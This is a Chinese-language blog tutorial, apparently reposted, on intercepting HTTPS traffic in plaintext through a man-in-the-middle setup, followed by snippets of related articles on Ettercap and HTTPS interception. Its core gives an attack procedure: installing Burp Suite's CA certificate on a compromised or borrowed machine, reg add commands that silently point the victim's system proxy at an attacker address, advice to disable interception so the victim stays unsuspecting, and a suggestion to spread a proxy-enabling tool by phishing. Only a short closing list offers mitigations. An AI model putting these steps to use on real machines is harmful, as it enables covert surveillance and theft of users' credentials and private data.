中间人攻击之劫持HTTPS明文数据

敏感数据的安全传输是网络安全技术的一个重要的组成部分,多数认为只有https是最好的实践,姑且不考虑ssl证书的价格,至少https也不是绝对安全的,当遭受中间人劫持攻击的时候也会获取到传输中的明文数据,具体攻击原理见《HTTPS连接过程以及中间人攻击劫持》,但是这篇文章也说了,使用中间人攻击手段必须让客户端信任中间人的证书,否则攻击无效。因此这种攻击方式难度大且不方便攻击,但是并不是说不能实现。个人认为至少有以下两种方式可以进行利用:
??一、获取服务器的远程桌面登录权限后,设置客户端信任中间人的证书!
??二、使用物理攻击,获取到被攻击者的电脑后,设置客户端信任中间人的证书

1.1.1 设置客户端信任中间人证书

??这里的中间人我们借助burpsuite,然后实现本次的一个https劫持攻击。首先我们需要客户端(被攻击者的电脑)信任burpsuite的证书,即进行安装burpsuite的CA证书,具体配置见官方配置

1.1.2 攻击条件

??通过思考我们发现,目前的利用也是存在有一定的限制的,姑且理解为技术不够。攻击条件主要有以下几方面:
??一、服务器需要是windows主机。
??二、攻击者需要有独立外网主机(或者同一局域网中)。
??三、拥有服务器的远程桌面控制权,或者临时拥有被攻击者的电脑。
??对于第三个条件简单说明下,拥有服务器的远程桌面控制权,不一定能获取到应用系统中存在的敏感数据或者数据库中的数据,例如,你在一个网站(只有一个登陆页面)处检测出了命令执行漏洞,可以执行命令,但是权限不是很高(即使权限很高,除非你只感兴趣服务器的控制权而不是应用系统中的敏感数据),此时我们就可以使用这种攻击方式了!

1.1.3 实验环境介绍

??操作系统:Microsoft Windows Server 2008 R2 Enterprise,IP:192.168.1.25
??用户权限组:*Users
??使用工具:burpsuite
??攻击者IP:192.168.1.200

1.1.4 配置攻击者burpsuite

??由于我们是要获取被攻击者传过来的数据包,而被攻击者往往都是处于内网,外网访问多数是通过映射出来的,所以我们设置我们的burpsuite的代理为任意ip过来的数据包,如下图所示:

1.1.5 设置被攻击者IE代理

??如果能进入到桌面环境,可以通过图形化界面进行设置IE代理,如下图所示:

??如果不能进入到远程桌面,我们可以使用下面命令进行设置IE代理:

//开启代理!
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
    //设置代理ip及端口,为攻击者的ip,端口与burpsuite设置保持一致!
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f
    //关闭设置的代理可以使用下面的命令:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

??以上命令经测试只要是users用户组即可成功执行,如下图所示,为了方便我们可以将开启和关闭的命令分别写为bat批处理文件。

1.1.6 获取劫持后的明文数据

??为了不让被攻击者怀疑,我们不要开启截断功能,如下图所示:

??现在攻击者只需要等待被攻击者使用浏览器访问相关网站,即使是https的站点我们同样能劫持到明文数据,如下图所示:

1.1.7 总结及修复建议

??另外如果只是http的网站的话,上面的攻击难度及危害会大大增加,因为不需要设置客户端去信任中间人的证书这一环节,只需要设置客户端的代理即可,而这一个可以使用钓鱼的方式将开启代理功能的工具进行传播就可以,或者只需要一个简单命令执行shell,普通权限就可以!修复建议参考如下:
??一、对服务器进行安全加固,防止利用服务器漏洞进行攻击!
??二、设置浏览器不要使用默认的系统代理,即IE全局代理!
??三、加强安全意识,离开电脑的时候记得设置密码锁屏,借电脑给别人用的时候尽量在旁边,使用完成后检查是否有异常!

原文地址:http://blog.51cto.com/eth10/2109483

时间: 2024-11-13 03:38:48

中间人攻击之劫持HTTPS明文数据的相关文章

Ettercap中间人攻击--介绍

前言 Ettercap有四种界面:Text,Curses,GTK2,Daemonize. -T      命令行界面,只显示字符.通常与配套的参数有-q(安静模式),加上该选项,则不会显示抓到的数据包内容. Curses和GTK2是图形化界面. Daemonize是守护模式,相当于在后台运行. ettercap运行方式 ettercap有两种运行方式:UNIFIED和BRIDGED. 其中,UNIFIED的方式是以中间人方式嗅探:BRIDGED方式是在双网卡情况下,嗅探两块网卡之间的数据包. U

HTTPS及HTTPS中间人攻击

全站HTTPS正在称为潮流趋势,国内实现全站https的有淘宝和百度两家 0x01:https的作用 C I A:机密性,完整性,可用性(可用性是合法用户可以访问自己有权限访问的资源) 解决的是信息传输中数据被篡改.窃取 加密:对称.非对称.单向 0x02:https工作原理 https的工作原理还是有必要研究下的(原理我也是从网上学习总结的,感谢这些前辈) 1. 客户端发起HTTPS请求 用户在浏览器里输入一个https网址,然后连接到server的443端口. 2. 服务端的配置 采用HTT

Android安全之Https中间人攻击漏洞

Android安全之Https中间人攻击漏洞 Android安全 Https 攻击漏洞 应用加固 御安全 MITM 0X01 概述   HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. 中间人攻击,Man-in-the-middle attack,缩写:MITM,是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全

我们来一起说说HTTPS中间人攻击与证书校验

一.前言 随着安全的普及,https通信应用越发广泛,但是由于对https不熟悉导致开发人员频繁错误的使用https,例如最常见的是未校验https证书从而导致"中间人攻击",并且由于修复方案也一直是个坑,导致修复这个问题时踩各种坑,故谨以此文简单的介绍相关问题. 本文第一节主要讲述https的握手过程,第二节主要讲述常见的"https中间人攻击"场景,第三节主要介绍证书校验修复方案,各位看官可根据自己口味浏览. 二.HTTPS握手过程 首先来看下https的工作原

解析中间人攻击(3/4)---会话劫持

本文我们将探讨会话劫持的理论以及演示,并讨论相关检测和防御技巧. 导言 在前面两篇文章中我们分别探讨了ARP缓存中毒和DNS欺骗,从前面展示的例子我们可以看到,中间人攻击是非常有效的攻击形式,并且越来越难以被察觉.而在本文中,我们将探讨会话劫持攻击的理论以及演示,并讨论相关检测和防御技巧. 会话劫持 我们经常会听到会话劫持,通常情况下,任何涉及对设备间会话的攻击就是会话劫持,这里所说的会话,指的是存在状态的设备间的连接. 在这篇文章中,我们将从cookie盗窃(涉及HTTP会话)角度来探讨会话劫

中间人攻击——ARP欺骗 就是中间人攻击 利用报文欺骗并修改IP和mac地址之间的映射关系 让传送数据的地址失效

中间人攻击——ARP欺骗的原理.实战及防御 0x01 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同 网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. 0x02 ARP协议 ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的.而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为I

再谈中间人攻击

前言 上一篇ARP欺骗与中间人攻击讲到了MITM攻击的基础和原理,并且在实验中成功对网关和目标主机进行了ARP毒化,从而使得无论目标的外出数据或流入数据都会经过本机这个“中间人”.在上篇后记里也略为提及到,中间人可以做的事情有很多,但是没有详细介绍.因此本文就来谈谈如何截取目标流量以及如何对目标看似杂乱无章的数据进行提取,分析和修改. 流量分析 通常我们成功变成中间人之后,会一直捕捉目标的流量数据并且保存为本地的cap文件,然后再用工具对数据信息进行分析.流量抓取的方式有很多,比如Linux下的

中间人攻击之arp欺骗 科普ARP欺骗

中间人攻击之arp欺骗 科普ARP欺骗 A <-> B A中有个ARP Table,每次发包都会在此Table中查找,若找不到,发APR Request包询问.此时若hacker冒充B的MAC,于是A -> hacker. (1)如何清空A中的ARP Table?不然它一查询,直接发包给B. 经过百度: ARP Table采用老化机制,某一行一段时间不用就被删除,提速. hacker大量发ARP包产生大量ARP通信量使通络堵塞,A就找不到B,A必然会发ARP Request包问:B是谁,

ettercap 实施中间人攻击

中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持.DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银.网游.网上交易等最有威胁并且最具破坏性的一种攻击方式, 随着计算机通信网技术的不断发展,MITM攻击也越来越多样化.最